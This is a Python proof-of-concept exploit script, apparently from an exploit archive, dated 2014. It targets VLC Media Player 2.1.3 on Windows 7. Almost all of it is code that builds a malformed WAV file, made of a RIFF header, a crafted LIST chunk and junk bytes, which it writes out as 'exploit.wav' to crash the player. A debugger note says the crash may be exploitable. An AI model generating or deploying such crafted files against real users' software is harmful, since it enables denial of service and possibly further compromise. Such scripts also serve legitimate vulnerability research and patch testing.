#!C:\Python27\python.exe

# Exploit Title: VLC Media Player - .WAV DoS
# Date: 2014-05-11
# Exploit Author: John Cobb - www.NoBytes.com
# Vendor Homepage: www.videolan.org
# Software Link: http://get.videolan.org/vlc/2.1.3/win32/vlc-2.1.3-win32.exe
# Version: 2.1.3 Rincewind
# Tested on: Win7 SP1 64bit
# CVE: None

# !exploitable
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at msvcrt!strcspn+0x000000000000002d (Hash=0x0c543936.0x0c29261d)
# The data from the faulting address is later used to determine whether or not a branch is taken.

# WAV Header:
WAVRIFFHEADER   = "\x52\x49\x46\x46\xD2\x04\x00\x00\x57\x41\x56\x45"
# List Chunk
ListChunk       = "\x4C\x49\x53\x54\x14\x00\x00\x00\x49\x4E\x46\x4F\x77\x77\x77\x2E\x4E\x6F\x42\x79\x74\x65\x73\x2E\x63\x6F\x6D\x00"
# Crash
Junk            = "\x41" * 7 # The Crash

payload = WAVRIFFHEADER + ListChunk + Junk

f = open("exploit.wav", 'w')
f.write(payload)
f.close()